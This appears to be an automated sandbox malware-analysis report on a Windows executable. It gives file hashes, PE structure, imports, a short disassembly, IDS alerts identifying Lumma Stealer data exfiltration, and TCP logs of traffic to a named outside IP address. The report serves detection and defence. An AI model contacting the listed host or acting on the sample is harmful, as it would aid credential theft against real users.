SHA-512:	6FE2DD50BCF3F195A505FCDA75C3FBF19893DFB193EBE2E5572564C91587196EA6997BFF22471967DFD3F67D1C353A0CB6DF56D106B228EE44E0AEC49C101792
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......hw4g............4...............H.......<...........T...."..........`.......8...........T............?..\`..........L...........8...............................................................................eJ..............GenuineIntel............T....... ....v4gK............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.708593303505153
Encrypted:	false
SSDEEP:	192:R6l7wVeJOgM6v6YcD3SUlgmfuSbN/pDM89bwesf0Nwm:R6lXJ06v6YwSUlgmf9Twdfi
MD5:	DA2AFDE5FE0FEB6C2A9893C9B5ADD17B
SHA1:	48DC364475F4E185DA7A79CF6745671279AE5AE0
SHA-256:	73B8C41740BDA5BEDA0D545878B5220CD01CBB2E60CAD0E4381AEEFE72370479
SHA-512:	02C0F201C67B010E504111A1C3DB217D92CCA8E3371531BFDCB63E27DE9C64B2FEA9E84F420D6099C9701110AF230B7150F0D0C5F818CDD4EC43E443D56E9998
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.481190618608644
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9uYCfWpW8VYvoYm8M4JTAwoFfTa+q8r/IbA13d:uIjfaI75h7VYJTxea2/qA13d
MD5:	309E006A8FD828B10095014B0400A273
SHA1:	15FA08D98C489B8CC5E68682EF288AE1F2F8D6AD
SHA-256:	9ACBEE835D5F641C7B34E6F8F71B91F2F0793BD72F8B6E47F570C7338CB84C3E
SHA-512:	60C24E7C5FD90045D5E977271631549FD78B279FC0B34C11F3DD1A71B65267FED822F584E2B5F150827911C996488EDFC531E5C9DF0EBB6C7DBE562468CE913E
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586137" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.393958386606649
Encrypted:	false
SSDEEP:	6144:nl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAIOBSqa:l4vF0MYQUMM6VFYSIU
MD5:	BB9B1CF0F943D8712B7DAD3F0B5081BC
SHA1:	36BC33F006073159331DBCAA56284CD13433816D
SHA-256:	7C12511DF68716527064059D51FCDD63FA55D13B3305E3A5296858FCB162AA34
SHA-512:	C3AFC95E92CC33C3D745A89F1A425CF04B47874E947919B28F6AB57C10D4D40677517DF484FD722C05872089471424E000879B479A4D98085EAB27FA45E9ABF0
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....5.................................................................................................................................................................................................................................................................................................................................................'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.289105738110891
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	OlZzqwjrwO.exe
File size:	476'672 bytes
MD5:	30ca3a9970c190d36ef5ab08d64406e6
SHA1:	fd44e251a898855a6c55e6fbd1eebbd807898052
SHA256:	0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e
SHA512:	2019ad2f2c2d20f98075c8b1edcac49392d9c29b63bb3e802735ac20313cfafa2fa999c26418fd6b563d6b299f1228a47bde1da349577be1f4b49efbeb374d25
SSDEEP:	12288:wIVsQqqGjd6eQ1YZVYcH4j1c45Wyv7d7JV:wI+1d6Qwcy1Yyv57
TLSH:	53A4E01273A5A870E69706718E2EC2F8662FF9714F6566EB735C5B2F0E702E1C632305
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{p..............l.......l.......l.......b..........Z....l.......l.......l......Rich............PE..L....9.b...................

File Icon


Icon Hash:	c11121094d61973e

Static PE Info

General

Entrypoint:	0x40b34f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x62EB3992 [Thu Aug 4 03:14:26 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	da3fdef870d17fb0b828d20b59c7836e

Entrypoint Preview

Instruction
call 00007F0A811FE7F6h
jmp 00007F0A811F7C6Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [0041F240h+ecx*8]
je 00007F0A811F7DF5h
inc ecx
cmp ecx, 2Dh
jc 00007F0A811F7DD3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F0A811F7DF0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0041F244h+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F0A811FB820h
test eax, eax
jne 00007F0A811F7DE8h
mov eax, 0041F3A8h
ret
add eax, 08h
ret
call 00007F0A811FB80Dh
test eax, eax
jne 00007F0A811F7DE8h
mov eax, 0041F3ACh
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F0A811F7DC7h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F0A811F7D67h
pop ecx
mov esi, eax
call 00007F0A811F7DA1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 4Ch
mov eax, dword ptr [0041F3DCh]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-20h], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-4Ch], esi
mov dword ptr [ebp-48h], ebx
cmp dword ptr [esi+14h], ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1da54	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2eb000	0xb328	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x44b8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1f0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d5ce	0x1d600	07af0fdca3ba1062fca91c90337d9fdf	False	0.5259973404255319	data	6.510079872443372	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1f000	0x2cad30	0x4b600	e36af2ae5ed3478e8207007e442f02a6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.relo	0x2ea000	0x5	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2eb000	0xb328	0xb400	4f8d9aadfe6c2dd2aba3e5ddbb319fa2	False	0.38426649305555555	data	4.336248611841472	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2eb4b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.49684115523465705
RT_ICON	0x2eb4b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.49684115523465705
RT_ICON	0x2ebd58	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5633640552995391
RT_ICON	0x2ebd58	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5633640552995391
RT_ICON	0x2ec420	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.5643063583815029
RT_ICON	0x2ec420	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.5643063583815029
RT_ICON	0x2ec988	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4326923076923077
RT_ICON	0x2ec988	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4326923076923077
RT_ICON	0x2eda30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.4192622950819672
RT_ICON	0x2eda30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.4192622950819672
RT_ICON	0x2ee3b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.4521276595744681
RT_ICON	0x2ee3b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.4521276595744681
RT_ICON	0x2ee880	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.31663113006396587
RT_ICON	0x2ee880	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.31663113006396587
RT_ICON	0x2ef728	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.3916967509025271
RT_ICON	0x2ef728	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.3916967509025271
RT_ICON	0x2effd0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.4377880184331797
RT_ICON	0x2effd0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.4377880184331797
RT_ICON	0x2f0698	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.4190751445086705
RT_ICON	0x2f0698	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.4190751445086705
RT_ICON	0x2f0c00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.25570539419087135
RT_ICON	0x2f0c00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.25570539419087135
RT_ICON	0x2f31a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.29080675422138835
RT_ICON	0x2f31a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.29080675422138835
RT_ICON	0x2f4250	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.3008196721311475
RT_ICON	0x2f4250	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.3008196721311475
RT_ICON	0x2f4bd8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.3351063829787234
RT_ICON	0x2f4bd8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.3351063829787234
RT_STRING	0x2f5358	0x416	data	Tamil	India	0.4560229445506692
RT_STRING	0x2f5358	0x416	data	Tamil	Sri Lanka	0.4560229445506692
RT_STRING	0x2f5770	0x360	data	Tamil	India	0.48032407407407407
RT_STRING	0x2f5770	0x360	data	Tamil	Sri Lanka	0.48032407407407407
RT_STRING	0x2f5ad0	0x25e	data	Tamil	India	0.4834983498349835
RT_STRING	0x2f5ad0	0x25e	data	Tamil	Sri Lanka	0.4834983498349835
RT_STRING	0x2f5d30	0x5f6	data	Tamil	India	0.4351245085190039
RT_STRING	0x2f5d30	0x5f6	data	Tamil	Sri Lanka	0.4351245085190039
RT_ACCELERATOR	0x2f50b8	0x90	data	Tamil	India	0.6944444444444444
RT_ACCELERATOR	0x2f50b8	0x90	data	Tamil	Sri Lanka	0.6944444444444444
RT_GROUP_ICON	0x2ee820	0x5a	data	Tamil	India	0.7222222222222222
RT_GROUP_ICON	0x2ee820	0x5a	data	Tamil	Sri Lanka	0.7222222222222222
RT_GROUP_ICON	0x2f5040	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x2f5040	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_VERSION	0x2f5148	0x20c	data			0.566793893129771

Imports

DLL

Import

KERNEL32.dll

SearchPathW, FindFirstChangeNotificationW, AllocConsole, GetConsoleAliasExesLengthA, LoadResource, InterlockedIncrement, WaitNamedPipeA, OpenSemaphoreA, FreeEnvironmentStringsA, MoveFileWithProgressA, EnumCalendarInfoExW, GetSystemTimeAsFileTime, EnumTimeFormatsA, SetProcessPriorityBoost, GetDriveTypeA, GetVolumePathNameW, GetPrivateProfileIntA, GetCalendarInfoA, GetFileAttributesW, SetSystemPowerState, lstrcatA, EnumSystemLocalesA, GetProfileIntA, DeleteFiber, GetLastError, GetCurrentDirectoryW, GlobalFix, SetComputerNameA, ResetEvent, LoadLibraryA, WriteConsoleA, GetProcessId, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, SetFileApisToANSI, QueryDosDeviceW, AddAtomA, GetPrivateProfileStructA, SetSystemTime, GlobalWire, GetModuleFileNameA, FindNextFileA, FindFirstVolumeMountPointA, CreateIoCompletionPort, GetModuleHandleA, CreateMailslotA, EnumDateFormatsW, CompareStringA, GetShortPathNameW, TerminateJobObject, FileTimeToLocalFileTime, EnumSystemLocalesW, GetProcAddress, GetVolumeNameForVolumeMountPointA, WideCharToMultiByte, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapAlloc, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, RaiseException, RtlUnwind, LCMapStringW, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, IsProcessorFeaturePresent, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetModuleFileNameW, SetFilePointer, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, IsValidLocale, GetConsoleCP, GetConsoleMode, LoadLibraryW, SetStdHandle, FlushFileBuffers, WriteConsoleW, CreateFileW, CloseHandle

GDI32.dll

GetCharABCWidthsW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-13T10:51:52.398965+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49873	94.158.244.69	80	TCP
2024-11-13T10:51:52.398965+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49978	94.158.244.69	80	TCP
2024-11-13T10:52:40.340723+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.9	49791	TCP
2024-11-13T10:52:53.109411+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49822	94.158.244.69	80	TCP
2024-11-13T10:53:11.235764+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49923	94.158.244.69	80	TCP
2024-11-13T10:53:17.926646+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.9	49976	TCP
2024-11-13T10:53:20.255878+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49974	94.158.244.69	80	TCP
2024-11-13T10:53:29.045691+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49977	94.158.244.69	80	TCP
2024-11-13T10:53:47.122818+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49979	94.158.244.69	80	TCP
2024-11-13T10:53:47.861590+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49980	94.158.244.69	80	TCP
2024-11-13T10:53:47.861590+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.9	49980	94.158.244.69	80	TCP
2024-11-13T10:54:05.396672+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49981	94.158.244.69	80	TCP
2024-11-13T10:54:14.201356+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49982	94.158.244.69	80	TCP
2024-11-13T10:54:23.154328+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49983	94.158.244.69	80	TCP
2024-11-13T10:54:31.935365+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49984	94.158.244.69	80	TCP
2024-11-13T10:54:40.737248+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49985	94.158.244.69	80	TCP
2024-11-13T10:54:49.522715+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.9	49986	94.158.244.69	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 10:52:44.619086027 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:44.624058962 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.624161005 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:44.624311924 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:44.624716043 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:44.629642963 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.629723072 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:44.630162954 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630173922 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630230904 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630249977 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:44.630259037 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630309105 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630317926 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630367994 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630376101 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.630392075 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.634717941 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.635080099 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.635122061 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.635133028 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:44.635154963 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.109304905 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.109411001 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.110094070 CET	49822	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.114996910 CET	80	49822	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.674740076 CET	49873	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.679919004 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.680027962 CET	49873	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.680162907 CET	49873	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.680804014 CET	49873	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.684933901 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.685009003 CET	49873	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.685739994 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.685750008 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.685786963 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.685796022 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.685817957 CET	49873	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.685841084 CET	49873	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:52:53.685868025 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.685877085 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.685960054 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.686005116 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.686012983 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.690030098 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.690732002 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.690767050 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.690774918 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.690814972 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.690823078 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:52:53.733715057 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:02.153971910 CET	80	49873	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:02.742502928 CET	49923	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:02.747481108 CET	80	49923	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:02.747551918 CET	49923	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:02.747658968 CET	49923	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:02.748101950 CET	49923	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:02.752469063 CET	80	49923	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:02.752840996 CET	80	49923	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:11.235680103 CET	80	49923	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:11.235764027 CET	49923	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:11.235816956 CET	49923	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:11.240751982 CET	80	49923	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:11.767182112 CET	49974	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:11.772233963 CET	80	49974	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:11.772321939 CET	49974	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:11.772420883 CET	49974	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:11.772795916 CET	49974	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:11.777996063 CET	80	49974	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:11.778014898 CET	80	49974	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:20.255733013 CET	80	49974	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:20.255877972 CET	49974	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:20.255959034 CET	49974	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:20.260770082 CET	80	49974	94.158.244.69	192.168.2.9
